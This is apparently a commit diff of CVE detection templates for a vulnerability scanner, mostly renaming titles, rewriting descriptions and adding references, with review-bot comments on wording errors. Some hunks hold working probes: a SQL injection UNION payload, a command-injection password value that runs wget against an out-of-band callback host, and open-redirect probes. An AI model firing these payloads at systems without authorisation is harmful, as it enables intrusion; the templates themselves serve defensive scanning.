cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03


@ -1,10 +1,10 @@
id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 Local File Inclusion/Server-Side Request Forgery
name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
author: madrobot
severity: critical
description: WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.
description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
reference:
- https://www.exploit-db.com/exploits/45158
- https://nvd.nist.gov/vuln/detail/CVE-2019-8982
@ -29,4 +29,5 @@ requests:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/18
# Enhanced by mp on 2022/05/03


@ -1,10 +1,10 @@
id: CVE-2019-9618
info:
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
author: daffainfo
severity: critical
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
@ -32,3 +32,5 @@ requests:
status:
- 200
- 500
# Enhanced by mp on 2022/05/03


@ -1,10 +1,10 @@
id: CVE-2019-9670
info:
name: Zimbra Collaboration XXE
name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
author: ree4pwn
severity: critical
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
reference:
- https://www.exploit-db.com/exploits/46693/
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
@ -12,6 +12,7 @@ info:
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
- http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
- https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9670
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -48,3 +49,5 @@ requests:
- type: status
status:
- 503
# Enhanced by mp on 2022/05/03


@ -1,17 +1,15 @@
id: CVE-2019-9733
info:
name: Artifactory Access-Admin Login Bypass
name: JFrog Artifactory 6.7.3 - Admin Login Bypass
author: akshansh
severity: critical
description: An issue was discovered in JFrog Artifactory 6.7.3. By default, the access-admin account is used to reset the password of the admin account in case an administrator gets locked out from the Artifactory
console. This is only allowable from a connection directly from localhost, but providing a X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the
access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in
turn, assume full control of all artifacts and repositories managed by Artifactory.
description: JFrog Artifactory 6.7.3 is vulnerable to an admin login bypass issue because by default the access-admin account is used to reset the password of the admin account. While this is only allowable from a connection directly from localhost, providing an X-Forwarded-For HTTP header to the request allows an unauthenticated user to login with the default credentials of the access-admin account while bypassing the whitelist of allowed IP addresses. The access-admin account can use Artifactory's API to request authentication tokens for all users including the admin account and, in turn, assume full control of all artifacts and repositories managed by Artifactory.
reference:
- http://packetstormsecurity.com/files/152172/JFrog-Artifactory-Administrator-Authentication-Bypass.html
- https://www.ciphertechs.com/jfrog-artifactory-advisory/
- https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
- https://nvd.nist.gov/vuln/detail/CVE-2019-9733
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -43,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04


@ -1,10 +1,11 @@
id: CVE-2020-11034
info:
name: GLPI v.9.4.6 - Open redirect
name: GLPI <9.4.6 - Open Redirect
author: pikpikcu
severity: medium
description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6.
description: GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.
remediation: Upgrade to version 9.4.6 or later.
reference:
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
@ -28,3 +29,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
part: header
# Enhanced by mp on 2022/05/04
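Review bot: The rewritten description at L793 changes the meaning of the advisory: the previous text (L792) said the open redirect *protection* is regexp-based and can be bypassed, whereas `GLPI prior 9.4.6 contains an open redirect vulnerability based on a regexp.` now reads as if the regexp were the flaw itself, and `prior 9.4.6` is missing a word. Suggested wording: `description: GLPI prior to 9.4.6 contains an open redirect vulnerability because its regexp-based open redirect protection can be bypassed.` The added `remediation` line on L794 is a good addition and can stay as is.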


@ -1,13 +1,14 @@
id: CVE-2020-11529
info:
name: Grav 1.7 Open Redirect
name: Grav <1.7 - Open Redirect
author: 0x_Akoko
severity: medium
description: Common/Grav.php in Grav before 1.7 has an Open Redirect. This is partially fixed in 1.6.23 and still present in 1.6.x.
description: Grav before 1.7 has an open redirect vulnerability via common/Grav.php. This is partially fixed in 1.6.23 and still present in 1.6.x.
reference:
- https://github.com/getgrav/grav/issues/3134
- https://www.cvedetails.com/cve/CVE-2020-11529
- https://nvd.nist.gov/vuln/detail/CVE-2020-11529
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,3 +26,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
part: header
# Enhanced by mp on 2022/05/04


@ -1,11 +1,10 @@
id: CVE-2020-11546
info:
name: SuperWebmailer Remote Code Execution
name: SuperWebmailer 7.21.0.01526 - Remote Code Execution
author: Official_BlackHat13
severity: critical
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to
execute arbitrary PHP code via Code Injection.
description: SuperWebMailer 7.21.0.01526 is susceptible to a remote code execution vulnerability in the Language parameter of mailingupgrade.php. An unauthenticated remote attacker can exploit this behavior to execute arbitrary PHP code via Code Injection.
reference:
- https://github.com/Official-BlackHat13/CVE-2020-11546/
- https://blog.to.com/advisory-superwebmailer-cve-2020-11546/
@ -41,3 +40,5 @@ requests:
- ajax_getemailingactions.php
- ajax_getemailtemplates.php
condition: and
# Enhanced by mp on 2022/05/04


@ -1,7 +1,7 @@
id: CVE-2020-12116
info:
name: Unauthenticated Zoho ManageEngine OpManger Arbitrary File Read
name: Zoho ManageEngine OpManger - Arbitrary File Read
author: dwisiswant0
severity: high
description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a specially crafted request.
@ -48,4 +48,4 @@ requests:
- 'status_code_2 == 200'
condition: and
# Enhanced by mp on 2022/04/04
# Enhanced by mp on 2022/05/04
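Review bot: The new title at L855 keeps the misspelling `OpManger` while the description on L858 spells the product `OpManager`; since this commit is normalising titles anyway, it should be `name: Zoho ManageEngine OpManager - Arbitrary File Read`. The new title also drops every version qualifier although L858 states the affected builds, and other titles in this commit carry the range (L996, L1284), so a qualifier taken from the description (e.g. `Zoho ManageEngine OpManager <124196 - Arbitrary File Read`, constructed from the Stable build figure on L858) would be consistent. The second hunk only refreshes the `Enhanced by` trailer.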


@ -4,10 +4,10 @@ info:
name: Onkyo TX-NR585 Web Interface - Directory Traversal
author: 0x_Akoko
severity: high
description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal
description: "Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion."
reference:
- https://blog.spookysec.net/onkyo-lfi
- https://www.cvedetails.com/cve/CVE-2020-12447
- https://nvd.nist.gov/vuln/detail/CVE-2020-12447
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04
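Review bot: The rewritten description at L872 has a number/verb mismatch, `devices allows`; since the line was rewritten anyway it should read `description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allow remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion.` The double quotes added around the value are not required (the scalar starts with a plain letter and contains no `: ` or ` #`), but they are harmless, so only the wording needs changing.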


@ -1,7 +1,7 @@
id: CVE-2020-14092
info:
name: WordPress PayPal Pro <1.1.65- SQL Injection
name: WordPress PayPal Pro <1.1.65 - SQL Injection
author: princechaddha
severity: critical
description: "WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format."
@ -40,4 +40,4 @@ requests:
status:
- 200
# Enhanced by mp on 2022/04/27
# Enhanced by mp on 2022/05/05


@ -19,15 +19,17 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
X-Forwarded-Prefix: "https://foo.nl"
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: body
words:
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
condition: or
part: body


@ -1,12 +1,13 @@
id: CVE-2020-17453
info:
name: WSO2 Carbon Management Console - XSS
name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
author: madrobot
severity: medium
description: Reflected XSS vulnerability can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -34,3 +35,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/05/04


@ -19,6 +19,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
redirects: true
max-redirects: 1
matchers-condition: and
@ -26,17 +27,19 @@ requests:
- type: word
words:
- "artica-applianc"
- type: status
status:
- 200
- 301
- 302
condition: or
- type: word
name: session
part: header
words:
- "PHPSESSID"
part: header
extractors:
- type: kval
kval:


@ -1,7 +1,7 @@
id: CVE-2020-19360
info:
name: FHEM 6.0 Local File Inclusion
name: FHEM 6.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: FHEM version 6.0 suffers from a local file inclusion vulnerability.
@ -28,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04


@ -1,12 +1,13 @@
id: CVE-2020-2140
info:
name: Jenkin Audit Trail Plugin XSS
name: Jenkin Audit Trail <=3.2 - Cross-Site Scripting
author: j3ssie/geraldino2
severity: medium
description: Jenkins Audit Trail Plugin 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
description: Jenkins Audit Trail 3.2 and earlier does not escape the error message for the URL Patterns field form validation, resulting in a reflected cross-site scripting vulnerability.
reference:
- https://www.jenkins.io/security/advisory/2020-03-09/
- https://nvd.nist.gov/vuln/detail/CVE-2020-2140
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -35,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04
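Review bot: The new title at L996 reads `Jenkin Audit Trail` while the rewritten description on L1000 (and the vendor advisory URL on L1002) says `Jenkins`; both lines were touched by this commit, so the title should be `name: Jenkins Audit Trail <=3.2 - Cross-Site Scripting`. The rest of the hunk is consistent with the naming scheme used elsewhere in this commit.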


@ -4,10 +4,10 @@ info:
name: Kyocera Printer d-COPIA253MF - Directory Traversal
author: 0x_Akoko
severity: high
description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.
description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
reference:
- https://www.exploit-db.com/exploits/48561
- https://www.cvedetails.com/cve/CVE-2020-23575
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
- https://www.kyoceradocumentsolutions.com.tr/tr.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@ -33,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04


@ -1,14 +1,15 @@
id: CVE-2020-24223
info:
name: Mara CMS 7.5 - Reflective Cross-Site Scripting
name: Mara CMS 7.5 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Mara CMS 7.5 allows cross-site scripting (XSS) in contact.php via the theme or pagetheme parameters.
description: "Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters."
reference:
- https://www.exploit-db.com/exploits/48777
- https://sourceforge.net/projects/maracms/ # vendor homepage
- https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link
- https://nvd.nist.gov/vuln/detail/CVE-2020-24223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
words:
- "text/html"
part: header
# Enhanced by mp on 2022/05/04


@ -16,16 +16,16 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Location: https://example.com"
part: header
- type: status
status:
- 301


@ -27,13 +27,17 @@ requests:
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
- |
POST /auth HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
username=root&password={{url_encode('123\",\"$6$$\"));import os;os.system(\"wget http://{{interactsh-url}}\");print(crypt.crypt(\"')}}
matchers-condition: and
matchers:
- type: status


@ -5,11 +5,11 @@ info:
author: gy741
severity: critical
description: |
A path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.
Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
- https://www.tenable.com/security/research/tra-2021-13
- https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
- https://nvd.nist.gov/vuln/detail/CVE-2021-20090
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -36,3 +36,5 @@ requests:
- 'pppoe'
- 'wan'
condition: and
# Enhanced by mp on 2022/05/05


@ -1,11 +1,10 @@
id: CVE-2021-20158
info:
name: Trendnet AC2600 TEW-827DRU - Unauthenticated Admin Password Change
name: Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change
author: gy741
severity: critical
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden
administrative command.
description: Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force change the admin password due to a hidden administrative command.
reference:
- https://www.tenable.com/security/research/tra-2021-54
- https://nvd.nist.gov/vuln/detail/CVE-2021-20150
@ -51,4 +50,4 @@ requests:
words:
- "text/html"
# Enhanced by cs on 2022/02/25
# Enhanced by mp on 2022/05/05
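Review bot: The NVD reference on L1130 points at CVE-2021-20150 while the template id on L1119 is CVE-2021-20158, and the commit rewrote the adjacent lines without reconciling this. The Tenable advisory on L1129 may cover several CVEs, so the link might be intentional; if it is a typo the entry should be `- https://nvd.nist.gov/vuln/detail/CVE-2021-20158`, and if it is intentional an inline `# related CVE` comment would stop the next reviewer from flagging it again. The hunk is cut after L1130, so any later references are not visible here.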


@ -1,12 +1,10 @@
id: CVE-2021-20167
info:
name: Netgear RAX43 - Unauthenticated Command Injection / Authentication Bypass Buffer Overrun via LAN Interface
name: Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun
author: gy741
severity: critical
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter.
Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination
of CVE-2021-20166 and CVE-2021-20167.'
description: 'Netgear RAX43 version 1.0.3.96 contains a command injection and authentication bypass vulnerability. The readycloud_control.cgi CGI application is vulnerable to command injection in the name parameter. Additionally, the URL parsing functionality in the cgi-bin endpoint of the router containers a buffer overrun issue that can redirection control flow of the application. Note: This vulnerability uses a combination of CVE-2021-20166 and CVE-2021-20167.'
reference:
- https://www.tenable.com/security/research/tra-2021-55
- https://nvd.nist.gov/vuln/detail/CVE-2021-20166
@ -34,4 +32,4 @@ requests:
words:
- "http"
# Enhanced by cs on 2022/02/22
# Enhanced by mp on 2022/05/05
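Review bot: The collapsed description at L1149 carries over two wording errors from the original text: `containers a buffer overrun issue that can redirection control flow` should read `contains a buffer overrun issue that can redirect control flow of the application`. Since the line was rewritten in this commit, this is the moment to fix it. The second hunk only refreshes the `Enhanced by` trailer.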


@ -1,11 +1,10 @@
id: CVE-2021-20837
info:
name: Unauthenticated RCE In MovableType
name: MovableType - Remote Command Injection
author: dhiyaneshDK,hackergautam
severity: critical
description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced
1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
description: MovableType 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors.
reference:
- https://nemesis.sh/posts/movable-type-0day/
- https://github.com/ghost-nemesis/cve-2021-20837-poc
@ -53,3 +52,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/05
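Review bot: The new description at L1170 still contains the stray space in `6.8. 2` (presumably `6.8.2`), and the new leading phrase `MovableType 5002 and earlier` presents `5002` as if it were a product version; it looks like a truncated release-number qualifier for the Movable Type 7 series, so please confirm the prefix against the NVD text linked elsewhere in the template rather than leaving the bare number. The part that is certain: `Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series)`.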


@ -1,11 +1,10 @@
id: CVE-2021-21307
info:
name: Remote Code Exploit in Lucee Admin
name: Lucee Admin - Remote Code Execution
author: dhiyaneshDk
severity: critical
description: Lucee Server is a dynamic, Java based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there is an unauthenticated
remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.
description: Lucee Admin before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 contains an unauthenticated remote code execution vulnerability.
reference:
- https://github.com/lucee/Lucee/security/advisories/GHSA-2xvv-723c-8p7r
- https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
@ -15,6 +14,7 @@ info:
cvss-score: 9.8
cve-id: CVE-2021-21307
cwe-id: CWE-862
remediation: This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, block access to the Lucee Administrator.
tags: cve,cve2021,rce,lucee,adobe
requests:
@ -84,3 +84,5 @@ requests:
- type: regex
regex:
- "(u|g)id=.*"
# Enhanced by mp on 2022/05/05


@ -1,14 +1,15 @@
id: CVE-2021-21479
info:
name: SCIMono < v0.0.19 Remote Code Execution
name: SCIMono <0.0.19 - Remote Code Execution
author: dwisiswant0
severity: critical
description: |
In SCIMono before 0.0.19, it is possible for an attacker to inject and
execute java expression compromising the availability and integrity of the system.
SCIMono before 0.0.19 is vulnerable to remote code execution because it is possible for an attacker to inject and
execute java expressions and compromise the availability and integrity of the system.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-227-scimono-ssti/
- https://nvd.nist.gov/vuln/detail/CVE-2021-21479
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
@ -30,3 +31,5 @@ requests:
- '"status" : "400"'
part: body
condition: and
# Enhanced by mp on 2022/05/05


@ -1,11 +1,10 @@
id: CVE-2021-21881
info:
name: Lantronix PremierWave 2050 - Remote Code Execution
name: Lantronix PremierWave 2050 8.9.0.0R4 - Remote Command Injection
author: gy741
severity: critical
description: An OS command injection vulnerability exists in the Web Manager Wireless Network Scanner functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to command
execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
description: Lantronix PremierWave 2050 8.9.0.0R4 contains an OS command injection vulnerability. A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner. An attacker can make an authenticated HTTP request to trigger this vulnerability.
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2021-1325
- https://nvd.nist.gov/vuln/detail/CVE-2021-21881
@ -39,3 +38,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/05
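Review bot: The rewritten description at L1245 lost the word `execution`: `A specially-crafted HTTP request can lead to command in the Web Manager Wireless Network Scanner` is an incomplete sentence. Suggested: `A specially-crafted HTTP request can lead to command execution in the Web Manager Wireless Network Scanner functionality.` The title change to `Remote Command Injection` matches the OS command injection the description states.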


@ -1,12 +1,13 @@
id: CVE-2021-21972
info:
name: VMware vCenter Unauthenticated RCE
name: VMware vSphere Client (HTML5) - Remote Code Execution
author: dwisiswant0
severity: critical
description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin.
description: "VMware vCenter vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2)."
reference:
- https://swarm.ptsecurity.com/unauth-rce-vmware/
- https://nvd.nist.gov/vuln/detail/CVE-2021-21972
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -32,3 +33,5 @@ requests:
regex:
- "(Install|Config) Final Progress"
part: body
# Enhanced by mp on 2022/05/05
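Review bot: The new title at L1261, `VMware vSphere Client (HTML5) - Remote Code Execution`, is identical to the title this same commit gives CVE-2021-21985 at L1311, so two different templates now report under one name; a qualifier drawn from the new description would keep them distinguishable in scan output, e.g. `name: VMware vCenter Server <7.0 U1c - Remote Code Execution` (constructed from the versions on L1265). The rewrite also drops the old caveat that this template only detects the plugin (L1264), which the matcher on L1274 (`(Install|Config) Final Progress`) bears out; the GitLab template in this commit keeps such a scope note (L1368), so consider appending `This template only detects the vulnerable plugin and does not confirm exploitability.` to the description.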


@ -1,16 +1,16 @@
id: CVE-2021-21978
info:
name: VMware View Planner Unauthenticated RCE
name: VMware View Planner <4.6 SP1- Remote Code Execution
author: dwisiswant0
severity: critical
description: |
This template detects an VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability.
Improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
VMware View Planner 4.x prior to 4.6 Security Patch 1 contains a remote code execution vulnerability due to improper input validation and lack of authorization leading to arbitrary file upload in logupload web application.
An unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted
file leading to remote code execution within the logupload container.
reference:
- https://twitter.com/osama_hroot/status/1367258907601698816
- https://nvd.nist.gov/vuln/detail/CVE-2021-21978
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -48,3 +48,5 @@ requests:
- type: dsl
dsl:
- "len(body) == 28" # length of "\nFile uploaded successfully."
# Enhanced by mp on 2022/05/05
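Review bot: The new title at L1284 is missing the space before the dash, `<4.6 SP1- Remote Code Execution`, the same defect that appears corrected for `<1.1.65-` at L892 in this commit; it should be `name: VMware View Planner <4.6 SP1 - Remote Code Execution`. The description rewrite on L1290 is fine, but note it is now one very long line inside a `|` block while the following two lines (L1291–L1292) keep the old wrapping, so the block scalar mixes styles.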


@ -1,15 +1,15 @@
id: CVE-2021-21985
info:
name: VMware vSphere Client (HTML5) RCE
name: VMware vSphere Client (HTML5) - Remote Code Execution
author: D0rkerDevil
severity: critical
description: |
The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
- https://www.vmware.com/security/advisories/VMSA-2021-0010.html
- https://github.com/alt3kx/CVE-2021-21985_PoC
- https://nvd.nist.gov/vuln/detail/CVE-2021-21985
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -32,3 +32,5 @@ requests:
words:
- '{"result":{"isDisconnected":'
part: body
# Enhanced by mp on 2022/05/05


@ -1,15 +1,15 @@
id: CVE-2021-22005
info:
name: VMware vCenter Server file upload vulnerability
name: VMware vCenter Server - Arbitrary File Upload
author: PR3R00T
severity: critical
description: The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3
base score of 9.8.
description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.
reference:
- https://kb.vmware.com/s/article/85717
- https://www.vmware.com/security/advisories/VMSA-2021-0020.html
- https://core.vmware.com/vmsa-2021-0020-questions-answers-faq
- https://nvd.nist.gov/vuln/detail/CVE-2021-22005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -39,3 +39,5 @@ requests:
- "contains(body_1, 'VMware vSphere')"
- "content_length_2 == 0"
condition: and
# Enhanced by mp on 2022/05/05


@ -1,12 +1,10 @@
id: CVE-2021-22205
info:
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
name: GitLab CE/EE - Remote Code Execution
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command
execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated
requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference:
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
@ -130,3 +128,5 @@ requests:
group: 1
regex:
- '(?:application-)(\S{64})(?:\.css)'
